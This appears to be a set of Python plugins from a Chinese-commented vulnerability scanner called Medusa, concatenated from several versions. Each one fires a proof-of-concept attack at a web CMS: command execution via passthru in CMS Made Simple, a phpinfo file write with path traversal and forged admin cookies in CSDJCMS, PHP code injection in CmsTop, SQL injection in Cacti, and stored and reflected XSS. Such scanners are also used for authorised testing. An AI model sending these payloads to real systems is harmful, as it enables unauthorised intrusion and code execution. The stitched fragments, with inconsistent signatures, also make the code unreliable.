def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4" data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Content-Length": "115", "Connection": "close", "Pragma": "no-cache", "Cache-Control": "no-cache" } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('''{"response":"Success","details":"}''') != -1: Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ":" + str(port) referer = scheme + "://" + url headers = { "Host": "{}".format(url), "User-Agent": RandomAgent, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer), "Cookie": "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "169" } data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5" s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text if con.find('PHP Version') != -1 and con.find('System'): Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/user/do.php?ac=edit@op=zl" payload_url = scheme + "://" + url + ":" + str(port) + payload referer = scheme + "://" + url headers = { "User-Agent": RandomAgent, "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer), "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "169" } data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>" s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text if con.find('PHP Version') != -1 and con.find('System'): Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl,payloadurl2] Medusas = [] # 存放返回数据 for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 : Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) web=ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 if len(Medusas) != 0: result = "" for i in Medusas: result = result + i + "\n" return (str(result))
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cdef.php?action=actions" data = "selected_items=a:1:{i:0;s:31:" ',benchmark(10000000,md5(c)),' ";}&drp_action=1 " payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, headers=headers, data=data, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/cmsms2.2.7/admin/siteprefs.php" data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("cscanhyhm2n")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search''' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('cscanhyhm2n') != -1: Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/k/cms/cmsmadesimple/install/index.php?sessiontest=1" data = '''default_cms_lang='%3e"%3e%3cbody%2fonload%3dalert(cscan-hyhmnn)%3e&submit=Submit''' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('cscan-hyhmnn') != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.Low() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ "/cmstop/apps/system/view/template/edit.php", "/apps/system/view/template/edit.php" ] Medusas = [] #存放返回数据 for payload in Payloads: try: payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text if con.find(' in <b>([^<]+)</b> on line <b>(\\d+)</b>') != -1: Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def San(Pool,Module,ActiveScanId,Uid,Headers,Url): #POC模块存进多进程池,这样如果批量扫描会变快很多 #主动扫描在这个位置对URL进行处理 #如果插件中有需要固定端口的,后面写一个正则替换端口即可 scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Url=scheme + "://" + url + ":" + str(port)#处理后的URL if Module==None: print("\033[32m[ + ] Scanning across modules:\033[0m" + "\033[35m AllMod \033[0m") for MedusaModule in MedusaModuleList: MedusaModuleList[MedusaModule](Pool,ActiveScanId=ActiveScanId,Uid=Uid,Headers=Headers,Url=Url,Proxies=proxies) # 调用列表里面的值 else: try: MedusaModuleList[Module](Pool, ActiveScanId=ActiveScanId,Uid=Uid,Headers=Headers,Url=Url,Proxies=proxies) # 调用列表里面的值 except: # 如果传入非法字符串会调用出错 print("\033[31m[ ! ] Please enter the correct scan module name\033[0m") os._exit(0) # 直接退出整个函数 Pool.Start(ProcessNumber)#启动多进程
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = ClassCongregation.UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/k/cms/cmsmadesimple/install/index.php" data = '''docroot=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(cscan-hyhmnn)%3e")&docpath=%2Fhome%2Fk%2Fpublic_html%2Fcms%2Fcmsmadesimple&querystr=page&frontendlang=en_US&umask=022&host=localhost&dbms=mysqli&database=cms&username=root&password=superpass&db_port=0&timezone=Europe%2FBerlin&prefix=cms_&createtables=1&email_accountinfo=0&adminemail=admin%40here.com&adminusername=admin&adminpassword=password&page=7&default_cms_lang=en_US''' payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '''<a href="$("<img/src='x'/onerror=alert(cscan-hyhmnn)>''' ) != -1: Medusa = "{}存在CMSMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类